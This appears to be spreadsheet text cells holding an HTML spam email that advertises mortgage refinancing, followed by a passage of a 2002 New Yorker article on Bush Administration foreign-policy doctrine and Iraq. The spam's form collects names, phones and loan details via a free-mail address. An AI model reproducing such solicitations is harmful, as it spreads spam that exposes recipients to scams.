    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;N=
 ew Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 6.00.2713.1100" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#ffffff leftMargin=3D0&gt;&lt;FON=
 T face=3DArial&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#336633 size=3D5&gt;Mortgage Rates Sl=
 ashed For 
       The Last Time!&lt;/FONT&gt;&lt;/B&gt; 
       &lt;HR&gt;
       &lt;FONT color=3D#000000 size=3D2&gt;&lt;B&gt;Let us help you get a new mortgage=
  for up to 
       100% of your home=FFFFFF92s value&lt;/B&gt; 
       &lt;P&gt;
       &lt;TABLE width=3D300 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dleft&gt;&lt;FONT color=3D#000000 size=3D4&gt;
             &lt;LI&gt;Lower your monthly payment! 
             &lt;LI&gt;Consolidate your debt! 
             &lt;LI&gt;Shorten the term of your loan! 
             &lt;LI&gt;Reduce your interest rate! &lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
       &lt;P&gt;&lt;FONT color=3D#ff0000 size=3D3&gt;&lt;B&gt;National Average Mortgage 
       Rates&lt;/B&gt;&lt;/FONT&gt; &lt;BR&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=3D2 cellPadding=3D5 border=3D4&gt;
         &lt;TBODY&gt;
         &lt;TR bgColor=3D#cccccc&gt;
           &lt;TD&gt;&lt;B&gt;Program&lt;/B&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;B&gt;Rates&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/B&gt;
         &lt;TR bgColor=3D#ffffff&gt;
           &lt;TD&gt;30 Yr Fixed&lt;/TD&gt;
           &lt;TD&gt;6.50%&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR bgColor=3D#ffffff&gt;
           &lt;TD&gt;15 Yr Fixed&lt;/TD&gt;
           &lt;TD&gt;6.25%&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR bgColor=3D#ffffff&gt;
           &lt;TD&gt;1 Yr Arm&lt;/TD&gt;
           &lt;TD&gt;5.51%&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;
       &lt;TABLE width=3D350 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#336633 size=3D4&gt;Choose From Hu=
 ndreds of 
             &lt;BR&gt;Loan Programs Like: &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;
       &lt;TABLE width=3D200 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dleft&gt;&lt;FONT color=3D#000000 size=3D3&gt;&lt;B&gt;
             &lt;LI&gt;Purchase Loans 
             &lt;LI&gt;Refinance 
             &lt;LI&gt;Debt Consolidation 
             &lt;LI&gt;Home Improvement 
             &lt;LI&gt;Interest Only Jumbo's 
             &lt;LI&gt;No Income Verification &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
       &lt;P&gt;
       &lt;TABLE width=3D350 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#336633 size=3D4&gt;Fill Out This =
 Simple 
             Form and We Will Compete For Your Business... 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;FONT color=3D#000000 size=3D2&gt;&lt;B&gt;Required Input Field&lt;FONT color=
 =3D#ff0000 
       size=3D2&gt;*&lt;/FONT&gt;&lt;/B&gt; 
       &lt;P&gt;
       &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 wid=
 th=3D600 
       borderColorLight=3D#ffffcc&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;
             &lt;FORM action=3Dmailto:glmortgage1006@firemail.de?subject=3DMor=
 tgage_Inquiry 
             method=3Dpost encType=3Dtext/plain&gt;
             &lt;TABLE width=3D"100%"&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Name&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
                   size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Address&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;City &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;State&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
                   size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Zip Code &lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
                   size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Buiness Phone&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
                   size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;
                 &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Home Phone &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT face=3DArial color=3D=
 #000000 
                   size=3D2&gt;&lt;B&gt;Best time to contact&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;
                 &lt;TD width=3D"56%"&gt;&lt;FONT color=3D#000000&gt;&lt;SELECT size=3D1 n=
 ame=3DBest 
                   contact to time&gt; &lt;OPTION selected&gt;&lt;/OPTION&gt; &lt;OPTION 
                     value=3DMorning&gt;Morning&lt;/OPTION&gt; &lt;OPTION 
                     value=3DAfternoon&gt;Afternoon&lt;/OPTION&gt; &lt;OPTION 
                     value=3DEvening&gt;Evening&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;=
 /TR&gt;&lt;/B&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Total Loan Request &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
                   face=3D"Arial, Helvetica, sans-serif" color=3D#000000 
                   size=3D2&gt;&lt;B&gt;Approx. Home Value &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
             &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsu=
 bmit&gt; 
             &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;
       &lt;P&gt;
       &lt;TABLE width=3D350 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D4&gt;
             &lt;MARQUEE&gt;A consultant will contact you soon. 
         &lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/MARQUEE&gt;&lt;/TABLE&gt;
       &lt;TABLE width=3D350&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;B&gt;All informa=
 tion given 
             herein is strictly confidential and will not be re-distributed=
  for 
             any reason other than for the specific use 
             intended.&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT face=3DArial color=3D#000000 siz=
 e=3D1&gt;To be 
             removed from our distribution lists, please &lt;A 
             href=3D"mailto:d_lete106@lycos.co.uk?subject=3DRemove_Mortgage=
 "&gt;Click 
             here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBOD=
 Y&gt;&lt;/TABLE&gt;&lt;/P&gt;
       &lt;CENTER&gt;&lt;/CENTER&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/FONT&gt;=
 &lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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The Next World Order
</t>
  </si>
  <si>
    <t xml:space="preserve">http://newyorker.com/fact/content/?020401fa_FACT1
 The New Yorker
 THE NEXT WORLD ORDER
 by NICHOLAS LEMANN
 The Bush Administration may have a brand-new doctrine of power.
 Issue of 2002-04-01
 Posted 2002-03-25
 When there is a change of command-and not just in government-the new people
 often persuade themselves that the old people were much worse than anyone
 suspected. This feeling seems especially intense in the Bush
 Administration, perhaps because Bill Clinton has been bracketed by a
 father-son team. It's easy for people in the Administration to believe
 that, after an unfortunate eight-year interlude, the Bush family has
 resumed its governance-and about time, too.
 The Bush Administration's sense that the Clinton years were a waste, or
 worse, is strongest in the realms of foreign policy and military affairs.
 Republicans tend to regard Democrats as untrustworthy in defense and
 foreign policy, anyway, in ways that coincide with what people think of as
 Clinton's weak points: an eagerness to please, a lack of discipline.
 Condoleezza Rice, Bush's national-security adviser, wrote an article in
 Foreign Affairs two years ago in which she contemptuously accused Clinton
 of "an extraordinary neglect of the fiduciary responsibilities of the
 commander in chief." Most of the top figures in foreign affairs in this
 Administration also served under the President's father. They took office
 last year, after what they regard as eight years of small-time flyswatting
 by Clinton, thinking that they were picking up where they'd left off.
 Not long ago, I had lunch with-sorry!-a senior Administration
 foreign-policy official, at a restaurant in Washington called the Oval
 Room. Early in the lunch, he handed me a twenty-seven- page report, whose
 cover bore the seal of the Department of Defense, an outline map of the
 world, and these words:
 Defense Strategy for the 1990s:
 The Regional Defense Strategy
 Secretary of Defense
 Dick Cheney
 January 1993
 One of the difficulties of working at the highest level of government is
 communicating its drama. Actors, professional athletes, and even elected
 politicians train for years, go through a great winnowing, and then perform
 publicly. People who have titles like Deputy Assistant Secretary of Defense
 are just as ambitious and competitive, have worked just as long and hard,
 and are often playing for even higher stakes-but what they do all day is go
 to meetings and write memos and prepare briefings. How, possibly, to
 explain that some of the documents, including the report that the senior
 official handed me, which was physically indistinguishable from a
 high-school term paper, represent the government version of playing
 Carnegie Hall?
 After the fall of the Berlin Wall, Dick Cheney, then the Secretary of
 Defense, set up a "shop," as they say, to think about American foreign
 policy after the Cold War, at the grand strategic level. The project, whose
 existence was kept quiet, included people who are now back in the game, at
 a higher level: among them, Paul Wolfowitz, the Deputy Secretary of
 Defense; Lewis Libby, Cheney's chief of staff; and Eric Edelman, a senior
 foreign-policy adviser to Cheney-generally speaking, a cohesive group of
 conservatives who regard themselves as bigger-thinking, tougher-minded, and
 intellectually bolder than most other people in Washington. (Donald
 Rumsfeld, the Secretary of Defense, shares these characteristics, and has
 been closely associated with Cheney for more than thirty years.) Colin
 Powell, then the chairman of the Joint Chiefs of Staff, mounted a
 competing, and presumably more ideologically moderate, effort to reimagine
 American foreign policy and defense. A date was set-May 21, 1990-on which
 each team would brief Cheney for an hour; Cheney would then brief President
 Bush, after which Bush would make a foreign-policy address unveiling the
 new grand strategy.
 Everybody worked for months on the "five-twenty-one brief," with a sense
 that the shape of the post-Cold War world was at stake. When Wolfowitz and
 Powell arrived at Cheney's office on May 21st, Wolfowitz went first, but
 his briefing lasted far beyond the allotted hour, and Cheney (a hawk who,
 perhaps, liked what he was hearing) did not call time on him. Powell didn't
 get to present his alternate version of the future of the United States in
 the world until a couple of weeks later. Cheney briefed President Bush,
 using material mostly from Wolfowitz, and Bush prepared his major
 foreign-policy address. But he delivered it on August 2, 1990, the day that
 Iraq invaded Kuwait, so nobody noticed.
 The team kept working. In 1992, the Times got its hands on a version of the
 material, and published a front-page story saying that the Pentagon
 envisioned a future in which the United States could, and should, prevent
 any other nation or alliance from becoming a great power. A few weeks of
 controversy ensued about the Bush Administration's hawks being
 "unilateral"-controversy that Cheney's people put an end to with denials
 and the counter-leak of an edited, softer version of the same material.
 As it became apparent that Bush was going to lose to Clinton, the Cheney
 team's efforts took on the quality of a parting shot. The report that the
 senior official handed me at lunch had been issued only a few days before
 Clinton took office. It is a somewhat bland, opaque document-a "scrubbed,"
 meaning unclassified, version of something more candid-but it contained the
 essential ideas of "shaping," rather than reacting to, the rest of the
 world, and of preventing the rise of other superpowers. Its tone is one of
 skepticism about diplomatic partnerships. A more forthright version of the
 same ideas can be found in a short book titled "From Containment to Global
 Leadership?," which Zalmay Khalilzad, who joined Cheney's team in 1991 and
 is now special envoy to Afghanistan, published a couple of years into the
 Clinton Administration, when he was out of government. It recommends that
 the United States "preclude the rise of another global rival for the
 indefinite future." Khalilzad writes, "It is a vital U.S. interest to
 preclude such a development-i.e., to be willing to use force if necessary
 for the purpose."
 When George W. Bush was campaigning for President, he and the people around
 him didn't seem to be proposing a great doctrinal shift, along the lines of
 the policy of containment of the Soviet Union's sphere of influence which
 the United States maintained during the Cold War. In his first major
 foreign-policy speech, delivered in November of 1999, Bush declared that "a
 President must be a clear-eyed realist," a formulation that seems to
 connote an absence of world-remaking ambition. "Realism" is exactly the
 foreign-policy doctrine that Cheney's Pentagon team rejected, partly
 because it posits the impossibility of any one country's ever dominating
 world affairs for any length of time.
 One gets many reminders in Washington these days of how much the terrorist
 attacks of September 11th have changed official foreign-policy thinking.
 Any chief executive, of either party, would probably have done what Bush
 has done so far-made war on the Taliban and Al Qaeda and enhanced domestic
 security. It is only now, six months after the attacks, that we are truly
 entering the realm of Presidential choice, and all indications are that
 Bush is going to use September 11th as the occasion to launch a new,
 aggressive American foreign policy that would represent a broad change in
 direction rather than a specific war on terrorism. All his rhetoric,
 especially in the two addresses he has given to joint sessions of Congress
 since September 11th, and all the information about his state of mind which
 his aides have leaked, indicate that he sees this as the nation's moment of
 destiny-a perception that the people around him seem to be encouraging,
 because it enhances Bush's stature and opens the way to more assertive
 policymaking.
 Inside government, the reason September 11th appears to have been "a
 transformative moment," as the senior official I had lunch with put it, is
 not so much that it revealed the existence of a threat of which officials
 had previously been unaware as that it drastically reduced the American
 public's usual resistance to American military involvement overseas, at
 least for a while. The Clinton Administration, beginning with the "Black
 Hawk Down" operation in Mogadishu, during its first year, operated on the
 conviction that Americans were highly averse to casualties; the all-bombing
 Kosovo operation, in Clinton's next-to-last year, was the ideal foreign
 military adventure. Now that the United States has been attacked, the
 options are much broader. The senior official approvingly mentioned a 1999
 study of casualty aversion by the Triangle Institute for Security Studies,
 which argued that the "mass public" is much less casualty-averse than the
 military or the civilian lite believes; for example, the study showed that
 the public would tolerate thirty thousand deaths in a military operation to
 prevent Iraq from acquiring weapons of mass destruction. (The American
 death total in the Vietnam War was about fifty-eight thousand.) September
 11th presumably reduced casualty aversion even further.
 Recently, I went to the White House to interview Condoleezza Rice. Rice's
 Foreign Affairs article from 2000 begins with this declaration: "The United
 States has found it exceedingly difficult to define its 'national interest'
 in the absence of Soviet power." I asked her whether that is still the
 case. "I think the difficulty has passed in defining a role," she said
 immediately. "I think September 11th was one of those great earthquakes
 that clarify and sharpen. Events are in much sharper relief." Like Bush,
 she said that opposing terrorism and preventing the accumulation of weapons
 of mass destruction "in the hands of irresponsible states" now define the
 national interest. (The latter goal, by the way, is new-in Bush's speech to
 Congress on September 20th, America's sole grand purpose was ending
 terrorism.) We talked in her West Wing office; its tall windows face the
 part of the White House grounds where television reporters do their
 standups. In her bearing, Rice seemed less crisply military than she does
 in public. She looked a little tired, but she was projecting a kind of
 missionary calm, rather than belligerence.
 In the Foreign Affairs article, Rice came across as a classic realist,
 putting forth "the notions of power politics, great powers, and power
 balances" as the proper central concerns of the United States. Now she
 sounded as if she had moved closer to the one-power idea that Cheney's
 Pentagon team proposed ten years ago-or, at least, to the idea that the
 other great powers are now in harmony with the United States, because of
 the terrorist attacks, and can be induced to remain so. "Theoretically, the
 realists would predict that when you have a great power like the United
 States it would not be long before you had other great powers rising to
 challenge it or trying to balance against it," Rice said. "And I think what
 you're seeing is that there's at least a predilection this time to move to
 productive and coperative relations with the United States, rather than to
 try to balance the United States. I actually think that statecraft matters
 in how it all comes out. It's not all foreordained."
 Rice said that she had called together the senior staff people of the
 National Security Council and asked them to think seriously about "how do
 you capitalize on these opportunities" to fundamentally change American
 doctrine, and the shape of the world, in the wake of September 11th. "I
 really think this period is analogous to 1945 to 1947," she said-that is,
 the period when the containment doctrine took shape-"in that the events so
 clearly demonstrated that there is a big global threat, and that it's a big
 global threat to a lot of countries that you would not have normally
 thought of as being in the coalition. That has started shifting the
 tectonic plates in international politics. And it's important to try to
 seize on that and position American interests and institutions and all of
 that before they harden again."
 The National Security Council is legally required to produce an annual
 document called the National Security Strategy, stating the over-all goals
 of American policy-another government report whose importance is great but
 not obvious. The Bush Administration did not produce one last year, as the
 Clinton Administration did not in its first year. Rice said that she is
 working on the report now.
 "There are two ways to handle this document," she told me. "One is to do it
 in a kind of minimalist way and just get it out. But it's our view that,
 since this is going to be the first one for the Bush Administration, it's
 important. An awful lot has happened since we started this process, prior
 to 9/11. I can't give you a certain date when it's going to be out, but I
 would think sometime this spring. And it's important that it be a real
 statement of what the Bush Administration sees as the strategic direction
 that it's going."
 It seems clear already that Rice will set forth the hope of a more dominant
 American role in the world than she might have a couple of years ago. Some
 questions that don't appear to be settled yet, but are obviously being
 asked, are how much the United States is willing to operate alone in
 foreign affairs, and how much change it is willing to try to engender
 inside other countries-and to what end, and with what means. The leak a
 couple of weeks ago of a new American nuclear posture, adding offensive
 capability against "rogue states," departed from decades of official
 adherence to a purely defensive position, and was just one indication of
 the scope of the reconsideration that is going on. Is the United States now
 in a position to be redrawing regional maps, especially in the Middle East,
 and replacing governments by force? Nobody thought that the Bush
 Administration would be thinking in such ambitious terms, but plainly it
 is, and with the internal debate to the right of where it was only a few
 months ago.
 Just before the 2000 election, a Republican foreign-policy figure suggested
 to me that a good indication of a Bush Administration's direction in
 foreign affairs would be who got a higher-ranking job, Paul Wolfowitz or
 Richard Haass. Haass is another veteran of the first Bush Administration,
 and an intellectual like Wolfowitz, but much more moderate. In 1997, he
 published a book titled "The Reluctant Sheriff," in which he poked a little
 fun at Wolfowitz's famous strategy briefing of the early nineties (he
 called it the "Pentagon Paper") and disagreed with its idea that the United
 States should try to be the world's only great power over the long term.
 "For better or worse, such a goal is beyond our reach," Haass wrote. "It
 simply is not doable." Elsewhere in the book, he disagreed with another of
 the Wolfowitz team's main ideas, that of the United States expanding the
 "democratic zone of peace": "Primacy is not to be confused with hegemony.
 The United States cannot compel others to become more democratic." Haass
 argued that the United States is becoming less dominant in the world, not
 more, and suggested "a revival of what might be called traditional
 great-power politics."
 Wolfowitz got a higher-ranking job than Haass: he is Deputy Secretary of
 Defense, and Haass is Director of Policy Planning for the State Department-
 in effect, Colin Powell's big-think guy. Recently, I went to see him in his
 office at the State Department. On the wall of his waiting room was an
 array of photographs of every past director of the policy-planning staff,
 beginning with George Kennan, the father of the containment doctrine and
 the first holder of the office that Haass now occupies.
 It's another indication of the way things are moving in Washington that
 Haass seems to have become more hawkish. I mentioned the title of his book.
 "Using the word 'reluctant' was itself reflective of a period when foreign
 policy seemed secondary, and sacrificing for foreign policy was a hard case
 to make," he said. "It was written when Bill Clinton was saying, 'It's the
 economy, stupid'-not 'It's the world, stupid.' Two things are very
 different now. One, the President has a much easier time making the case
 that foreign policy matters. Second, at the top of the national-security
 charts is this notion of weapons of mass destruction and terrorism."
 I asked Haass whether there is a doctrine emerging that is as broad as
 Kennan's containment. "I think there is," he said. "What you're seeing from
 this Administration is the emergence of a new principle or body of
 ideas-I'm not sure it constitutes a doctrine-about what you might call the
 limits of sovereignty. Sovereignty entails obligations. One is not to
 massacre your own people. Another is not to support terrorism in any way.
 If a government fails to meet these obligations, then it forfeits some of
 the normal advantages of sovereignty, including the right to be left alone
 inside your own territory. Other governments, including the United States,
 gain the right to intervene. In the case of terrorism, this can even lead
 to a right of preventive, or peremptory, self-defense. You essentially can
 act in anticipation if you have grounds to think it's a question of when,
 and not if, you're going to be attacked."
 Clearly, Haass was thinking of Iraq. "I don't think the American public
 needs a lot of persuading about the evil that is Saddam Hussein," he said.
 "Also, I'd fully expect the President and his chief lieutenants to make the
 case. Public opinion can be changed. We'd be able to make the case that
 this isn't a discretionary action but one done in self-defense."
 On the larger issue of the American role in the world, Haass was still
 maintaining some distance from the hawks. He had made a speech not long
 before called "Imperial America," but he told me that there is a big
 difference between imperial and imperialist. "I just think that we have to
 be a little bit careful," he said. "Great as our advantages are, there are
 still limits. We have to have allies. We can't impose our ideas on
 everyone. We don't want to be fighting wars alone, so we need others to
 join us. American leadership, yes; but not American unilateralism. It has
 to be multilateral. We can't win the war against terror alone. We can't
 send forces everywhere. It really does have to be a collaborative endeavor."
 He stopped for a moment. "Is there a successor idea to containment? I think
 there is," he said. "It is the idea of integration. The goal of U.S.
 foreign policy should be to persuade the other major powers to sign on to
 certain key ideas as to how the world should operate: opposition to
 terrorism and weapons of mass destruction, support for free trade,
 democracy, markets. Integration is about locking them into these policies
 and then building institutions that lock them in even more."
 The first, but by no means the last, obvious manifestation of a new
 American foreign policy will be the effort to remove Saddam Hussein. What
 the United States does in an Iraq operation will very likely dwarf what's
 been done so far in Afghanistan, both in terms of the scale of the
 operation itself and in terms of its aftermath.
 Several weeks ago, Ahmad Chalabi, the head of the Iraqi National Congress,
 the Iraqi opposition party, came through Washington with an entourage of
 his aides. Chalabi went to the State Department and the White House to ask,
 evidently successfully, for more American funding. His main public event
 was a panel discussion at the American Enterprise Institute. Chalabi's
 leading supporter in town, Richard Perle, the prominent hawk and former
 Defense Department official, acted as moderator. Smiling and supremely
 confident, Perle opened the discussion by saying, "Evidence is mounting
 that the Administration is looking very carefully at strategies for dealing
 with Saddam Hussein." The war on terrorism, he said, will not be complete
 "until Saddam is successfully dealt with. And that means replacing his
 regime. . . . That action will be taken, I have no doubt."
 Chalabi, who lives in London, is a charming, suave middle-aged man with a
 twinkle in his eye. He was dressed in a double-breasted pin-striped suit
 and a striped shirt with a white spread collar. Although he and his
 supporters argue that the Iraqi National Congress, with sufficient American
 support, can defeat Saddam just as the Northern Alliance defeated the
 Taliban in Afghanistan, this view hasn't won over most people in
 Washington. It isn't just that Chalabi doesn't look the part of a rebel
 military leader ("He could fight you for the last petit four on the tray
 over tea at the Savoy, but that's about it," one skeptical former Pentagon
 official told me), or that he isn't in Iraq. It's also that Saddam's
 military is perhaps ten times the size that the Taliban's was, and has been
 quite successful at putting down revolts over the last decade. The United
 States left Iraq in 1991 believing that Saddam might soon fall to an
 internal rebellion; Chalabi's supporters believe that Saddam is much weaker
 now, and that even signs that a serious operation was in the offing could
 finish him off. But non-true believers seem to be coming around to the idea
 that a military operation against Saddam would mean the deployment of
 anywhere from a hundred thousand to three hundred thousand American ground
 troops.
 Kenneth Pollack, a former C.I.A. analyst who was the National Security
 Council's staff expert on Iraq during the last years of the Clinton
 Administration, recently caused a stir in the foreign-policy world by
 publishing an article in Foreign Affairs calling for war against Saddam.
 This was noteworthy because three years ago Pollack and two co-authors
 published an article, also in Foreign Affairs, arguing that the Iraqi
 National Congress was incapable of defeating Saddam. Pollack still doesn't
 think Chalabi can do the job. He believes that it would require a
 substantial American ground, air, and sea force, closer in size to the one
 we used in Kuwait in 1990-91 than to the one we are using now in
 Afghanistan.
 Pollack, who is trim, quick, and crisp, is obviously a man who has given a
 briefing or two in his day. When I went to see him at his office in
 Washington, with a little encouragement he got out from behind his desk and
 walked over to his office wall, where three maps of the Middle East were
 hanging. "The only way to do it is a full-scale invasion," he said, using a
 pen as a pointer. "We're talking about two grand corps, two to three
 hundred thousand people altogether. The population is here, in the
 Tigris-Euphrates valley." He pointed to the area between Baghdad and Basra.
 "Ideally, you'd have the Saudis on board." He pointed to the Prince Sultan
 airbase, near Riyadh. "You could make Kuwait the base, but it's much easier
 in Saudi. You need to take western Iraq and southern Iraq"-pointing
 again-"because otherwise they'll fire Scuds at Israel and at the Saudi oil
 fields. You probably want to prevent Iraq from blowing up its own oil
 fields, so troops have to occupy them. And you need troops to defend the
 Kurds in northern Iraq." Point, point. "You go in as hard as you can, as
 fast as you can." He slapped his hand on the top of his desk. "You get the
 enemy to divide his forces, by threatening him in two places at once." His
 hand hit the desk again, hard. "Then you crush him." Smack.
 That would be a reverberating blow. The United States has already removed
 the government of one country, Afghanistan, the new government is obviously
 shaky, and American military operations there are not completed. Pakistan,
 which before September 11th clearly met the new test of national
 unacceptability (it both harbors terrorists and has weapons of mass
 destruction), will also require long-term attention, since the country is
 not wholly under the control of the government, as the murder of Daniel
 Pearl demonstrated, and even parts of the government, like the intelligence
 service, may not be entirely under the control of the President. In Iraq,
 if America invades and brings down Saddam, a new government must be
 established-an enormous long-term task in a country where there is no
 obvious, plausible new leader. The prospective Iraq operation has drawn
 strong objections from the neighboring nations, one of which, Russia, is a
 nuclear superpower. An invasion would have a huge effect on the internal
 affairs of all the biggest Middle Eastern nations: Iran, Turkey, Saudi
 Arabia, and even Egypt. Events have forced the Administration to become
 directly involved in the Israeli-Palestinian conflict, as it hadn't wanted
 to do. So it's really the entire region that is in play, in much the way
 that Europe was immediately after the Second World War.
 In September, Bush rejected Paul Wolfowitz's recommendation of immediate
 moves against Iraq. That the President seems to have changed his mind is an
 indication, in part, of the bureaucratic skill of the Administration's
 conservatives. "These guys are relentless," one former official, who is
 close to the high command at the State Department, told me. "Resistance is
 futile." The conservatives' other weapon, besides relentlessness, is
 intellectualism. Colin Powell tends to think case by case, and since
 September 11th the conservatives have outflanked him by producing at least
 the beginning of a coherent, hawkish world view whose acceptance
 practically requires invading Iraq. If the United States applies the
 doctrines of Cheney's old Pentagon team, "shaping" and expanding "the zone
 of democracy," the implications would extend far beyond that one operation.
 The outside experts on the Middle East who have the most credibility with
 the Administration seem to be Bernard Lewis, of Princeton, and Fouad Ajami,
 of the Johns Hopkins School of Advanced International Studies, both of whom
 see the Arab Middle East as a region in need of radical remediation. Lewis
 was invited to the White House in December to brief the senior
 foreign-policy staff. "One point he made is, Look, in that part of the
 world, nothing matters more than resolute will and force," the senior
 official I had lunch with told me-in other words, the United States needn't
 proceed gingerly for fear of inflaming the "Arab street," as long as it is
 prepared to be strong. The senior official also recommended as interesting
 thinkers on the Middle East Charles Hill, of Yale, who in a recent essay
